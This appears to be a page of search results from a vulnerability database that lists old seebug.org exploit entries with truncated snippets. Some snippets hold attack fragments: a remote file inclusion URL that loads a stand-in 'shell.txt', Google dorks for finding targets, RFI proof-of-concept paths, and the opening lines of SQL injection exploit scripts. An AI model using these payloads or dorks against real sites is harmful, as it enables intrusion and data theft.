Lucene search
+L
SeebugRecent

56796 matches found

seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข17 views

WordPress IP-Logger Plugin <= 3.0 - SQL Injection Vulnerability

No description provided by source. Exploit Title: WordPress IP-Logger plugin = 3.0 SQL Injection Vulnerability Date: 2011-08-16 Author: Miroslav Stampar miroslav.stamparatgmail.com @stamparm Software Link: http://downloads.wordpress.org/plugin/ip-logger.3.0.zip Version: 3.0 tested --- PoC ---...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข21 views

Microsoft Windows 2000/NT 4 Local Descriptor Table Local Privilege Escalation Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/10122/info Microsoft Windows Local Descriptor Table programming interface is prone to a privilege-escalation vulnerability. A local attacker may be able to create a malicious entry in the Local Descriptor Table. This entr...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข15 views

Filezilla FTP Server <= 0.9.21 (LIST/NLST) Denial of Service Exploit

No description provided by source. ?php Filezilla FTP Server 0.9.20 beta / 0.9.21 LIST, NLST and NLST -al Denial Of Service by shinnai mail: shinnaiatautisticidotorg site: http://shinnai.altervista.org special thanks to rgod for his first advisory about STOR Denial of service, see:...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข17 views

Sysax <= 5.62 Admin Interface Local Buffer Overflow

No description provided by source. !/usr/bin/python Title: Sysax = 5.62 Admin Interface Local Buffer Overflow Author: Craig Freyman @cd1zz Tested on: XP SP3 32bit Date Discovered: June 15, 2012 Vendor Contacted: June 19, 2012 Details:...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข15 views

cpcommerce 1.1.0 (xss/lfi) Multiple Vulnerabilities

No description provided by source. www.BugReport.ir AmnPardaz Security Research Team Title: cpCommerce Multiple Vulnerabilities Vendor: http://cpcommerce.cpradio.org Bugs: XSS, SQL Injection , Local File Inclusion Vulnerable Version: 1.1.0 prior versions also may be affected Exploitation: Remote...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข25 views

PayProCart <= 1146078425 Multiple Remote File Include Vulnerabilities

No description provided by source. google dork :powered by: profitCode exploite: http://url/index.php?proMod=http://shell.txt? discoverde by momo26 ;!!!!!!!!!!!!!!! +-------------------------------------------------------------------- + + ppalCart V2.5 EE Remote File Inclusion +...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข16 views

Crystal Report Viewer 8.0.0.371 - ActiveX Denial of Service Vulnerability

No description provided by source. html Crystal Reporting Viewer v8.0.0.371 Author: Matthew Bergin Website: www.berginpentesting.com Website: www.smashthestack.org object classid='clsid:C4847596-972C-11D0-9567-00A0C9273C2A' id='target' /object script language='vbscript' targetFile =...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข26 views

Barracuda Spam Firewall 3.3.x preview_email.cgi file Parameter Arbitrary File Access

No description provided by source. source: http://www.securityfocus.com/bid/19276/info Spam Firewall is prone to multiple vulnerabilities, including a directory-traversal issue, access-validation issue, and a remote command-execution issue. A remote attacker can exploit these issues to gain acces...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข17 views

MacOS X 10.1.x SoftwareUpdate Arbitrary Package Installation Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/5176/info A vulnerability has been reported for MacOS X where an attacker may use SoftwareUpdate to install malicious software on the vulnerable system. SoftwareUpdate uses HTTP, without any authentication, to obtain...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข28 views

AIOCP 1.3.x cp_forum_view.php choosed_language Parameter SQL Injection

No description provided by source. source: http://www.securityfocus.com/bid/20931/info All In One Control Panel AIOCP is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. Exploiting these issues could allow an attacker to steal...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข29 views

NotSopureEdit <= 1.4.1 - Remote File Include Vulnerability

No description provided by source. ======================================================== NotSopureEdit = 1.4.1 Remote File Include Vulnerability ======================================================== + NotSopureEdit = 1.4.1 Remote File Include Vulnerability...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข16 views

Clickbank Portal 'search.php' Cross Site Scripting Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/31438/info Clickbank Portal is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browse...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข11 views

Cline Communications Multiple SQL Injection Vulnerabilities

No description provided by source. source: http://www.securityfocus.com/bid/18491/info Cline Communications is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. A successfu...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข24 views

Novell NetWare 6.5 SP2-SP7 - LSASS CIFS.NLM Overflow

No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core'...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข34 views

Air Gallery 1.0 Air Photo Browser - Multiple Vulnerabilities

No description provided by source. Document Title: =============== Air Gallery 1.0 Air Photo Browser - Multiple Vulnerabilities References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1165 Release Date: ============= 2013-12-09 Vulnerability Laboratory ID VL-ID:...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข28 views

InternetNow ProxyNow 2.6/2.75 Multiple Stack and Heap Overflow Vulnerabilities

No description provided by source. source: http://www.securityfocus.com/bid/9500/info ProxyNow has been reported to be prone to multiple overflow vulnerabilities that may allow an attacker to execute arbitrary code in order to gain unauthorized access to a vulnerable system. The vulnerabilities...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข13 views

Nullsoft Winamp <= 5.3 (Ultravox-Max-Msg) Heap Overflow DoS PoC

No description provided by source. / Nullsoft Winamp 5.31 Ultravox Ultravox-Max-Msg Heap Overflow Dos POC by cocoruderfrankruderathotmail.com,2006/10/30 use like winampunsv.exe ultravox-max-msgvalue,then the winampunsvsimple ultravox server will listen on tcp port 80,when winamp connect the serve...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข16 views

bloofoxCMS 0.3.5 'search' Parameter Cross Site Scripting Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/36700/info bloofoxCMS is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input passed through the 'search' parameter. An attacker may leverage this issue ...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข12 views

Genium CMS 2012/Q2 - Multiple Vulnerabilities

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข22 views

Uptime Agent 5.0.1 - Stack Overflow Vulnerability

No description provided by source. Exploit Title: Up.Time Agent 5.0.1 Stack Overflow Date: 28/11/2013 Exploit Author: Denis Andzakovic Vendor Homepage: http://www.uptimesoftware.com/ Version: 5.0.1 Tested on: Debian 7 Kernel 3.2.0, Kali Kernel 3.7 , , . '.' '. ', . , '. , .', , / / / \ \ ==/ /\ ...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข19 views

PEAR 1.9.0 - Multiple Remote File Inclusion Vulnerability

No description provided by source. PEAR v.1.9.0 Multiple Remote File Inclusion Vulnerability PEAR, the PHP Extension and Application Repository @package PEAR @Version v.1.9.0 @license http://opensource.org/licenses/bsd-license.php New BSD License @link http://pear.php.net/package/PEAR Type : Remo...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข13 views

vam shop 1.69 - Multiple Vulnerabilities

No description provided by source. Product: VaM Shop Vendor: Vamsoft http://vamshop.ru/ Vulnerable Version: 1,69 and probably prior versions. Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response Risk level: High Credit: Security Effect Teamhttp://seceffect.tumblr.com/ Vulnerability Details...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข12 views

SerWeb <= 2.1.0-dev1 2009-07-02 - Multiple RFI Vulnerabilities

No description provided by source. SerWeb = 2.1.0-dev1 2009-07-02 Multiple Remote File Inclusion Vulnerabilities D.Script : http://ftp.iptel.org/pub/serweb/daily-snapshots/ POC: /loadlang.php?SERWEBconfigdir=Shell /mainprepend.php?SERWEBfunctionsdir=Shell /loadphplib.php?PHPLIBlibdir=Shell Us =...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข12 views

LifeType <= 1.0.4 - SQL Injection / Admin Credentials Disclosure Exploit

No description provided by source. !/usr/bin/php -q -d shortopentag=on ? echo LifeType = 1.0.4r3270 SQL injection / admin credentials disclosure\r\n; echo by rgod [email protected]\r\n; echo site: http://retrogod.altervista.org\r\n; echo dork: \Powered by LifeType\ \RSS 0.90\ \RSS 1.0\ \RSS 2.0...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข17 views

UbiDisk File Manager 2.0 iOS - Multiple Web Vulnerabilities

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข27 views

iPhone MobileSafari LibTIFF Buffer Overflow

No description provided by source. $Id: safarilibtiff.rb 10394 2010-09-20 08:06:27Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข10 views

Webfroot Shoutbox 2.32 Remote Command Execution Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/7746/info Shoutbox is prone to an issue that may result in the execution of attacker-supplied code. The vulnerability exists due to insufficient sanitization of the 'conf' URI parameter. An attacker can exploit this...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข16 views

Lodel CMS 0.7.3 Calcul-Page.PHP Remote File Include Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/20551/info Lodel CMS is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. A successful exploit of this issue allows an attacker to execute arbitrary server-side script...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข15 views

Synkron.Web 3.0 HTML Injection Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/7833/info Synkron.web is prone to HTML injection attacks. The vulnerability exists in the search script and is a result of insufficient sanitization of malicious HTML code from user-supplied input. HTML and script code ma...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข146 views

Paddelberg Topsite Script Authentication Bypass Vulnerability

No description provided by source. Exploit Title: Paddelberg's topsite-script admin auth bypass. Google Dork: intext:powered by php scripte webmaster resource Date: 8. 1. 2012 Author: Christian Inci Software Link: http://www.paddelberg.de/gratis-toplisten-script/gratis-download/ Version: = 1.23 2...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข23 views

ArGoSoft FTP Server 1.2.2 .2 Weak Password Encryption Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/3029/info ArGoSoft FTP server is an FTP server for the Windows platform. A design error exists in ArGoSoft FTP which enables an authenticated user to view other users encrypted passwords. However due to a weak encryption...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข15 views

osCommerce 2.2 manufacturers_id Parameter Cross-Site Scripting Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/9277/info A vulnerability has been reported to exist in the software that may allow a remote user to launch cross-site scripting attacks. The problem is reported to exist due to improper sanitizing of user-supplied data i...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข16 views

Winds3D Viewer 3 'GetURL()' Arbitrary File Download Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/35595/info Winds3D Viewer is prone to a vulnerability that can allow malicious files to be downloaded an executed within the context of the affected browser that uses the plugin. Successfully exploiting this issue will...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข21 views

Halloween Linux 4.0,RedHat Linux 6.1/6.2 imwheel Vulnerability (2)

No description provided by source. source: http://www.securityfocus.com/bid/1060/info A vulnerability exists in the 'imwheel' package for Linux. This package is known to be vulnerable to a buffer overrun in its handling of the HOME environment variable. By supplying a sufficiently long string...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข24 views

Flux Player 3.1.0 iOS - Multiple Vulnerabilities

No description provided by source. Title: ====== Flux Player v3.1.0 iOS - File Include & Arbitrary File Upload Vulnerability Date: ===== 2013-07-16 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=1013 VL-ID: ===== 1013 Common Vulnerability Scoring System:...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข13 views

AVCon DEP Bypass

No description provided by source. DEP Bypass for OptIn/OptOut all modules used are not aslr aware script produces a text file, copy the contents paste in the input field next to the call button discovered by Dillon Beresford import sys from struct import pack print \n===================== print...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข24 views

PlutoStatus Locator 1.0pre alpha 'index.php' Local File Include Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/27802/info PlutoStatus Locator is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability using directory-traversal strings to...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข18 views

Invision Power Services Invision Board 2.0.4 Help Action HID Parameter XSS

No description provided by source. source: http://www.securityfocus.com/bid/17144/info Invision Power Board is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage these issu...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข18 views

Ashwebstudio Ashnews 0.83 Cross-Site Scripting Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/16426/info Ashnews is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary script...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข18 views

WordPress 2.1.3 Akismet Plugin Unspecified Vulnerability

source: http://www.securityfocus.com/bid/23965/info The WordPress Akismet plugin is prone to an unspecified vulnerability. Few technical details are currently available. We will update this BID as more information emerges...

6.9AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข12 views

Netsweeper WebAdmin Portal Multiple Vulnerabilities

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข23 views

OpenBB 1.0/1.1 Member.PHP Remote SQL Injection Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/7405/info It has been reported that OpenBB does not properly check input passed via the 'member.php' script. Because of this, an attacker may be able to inject arbitrary commands to the database in the context of the...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข10 views

fastream netfile ftp/web server 6.5/6.7 - Directory Traversal vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/10658/info The NetFile FTP/Web Server is reported prone to a directory traversal vulnerability due to insufficient sanitization of user-supplied data. This can allow an attacker to create, view, and delete arbitrary files...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข15 views

Mediatheka <= 4.2 - Remote Blind SQL Injection Exploit

No description provided by source. !/usr/bin/perl -w Mediatheka = 4.2 Remote Blind SQL Injection Exploit by athos - stakerathotmaildotit use strict; use LWP::UserAgent; my $stop,$start,$hash; my $domain = shift; my $userid = shift or my @chars = 48..57, 97..102; my $substr = 1; my $http = new...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข18 views

Dr. Web Control Center 6.00.3.201111300 XSS Vulnerability

No description provided by source. Dr. Web Control Center Admin UI Remote Script Code Injection ============================================================= Affected Products/Versions -------------------------- Product Name: Dr. Web Enterprise Server Version Number: 6.00.3.201111300...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข51 views

Redmine SCM Repository 0.9.x, 1.0.x - Arbitrary Command Execution

No description provided by source. $Id: redminescmexec.rb 11516 2011-01-08 01:13:26Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข11 views

mBlogger 1.0.04 (viewpost.php) - SQL Injection Exploit

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข15 views

rgb72 WCMS 1.0 'index.php' SQL Injection Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/31298/info rgb72 WCMS is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข19 views

Notepad++ CCompletion Plugin 1.19 - Stack Buffer Overflow

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
โ€ขadded 2014/07/01 12:0 a.m.โ€ข11 views

Sun Java System Messenger Express 6.1-13-15 - 'sid' Cross-Site Scripting Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/28649/info Sun Java System Messenger Express is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrar...

7.1AI score
Exploits0
Total number of security vulnerabilities56796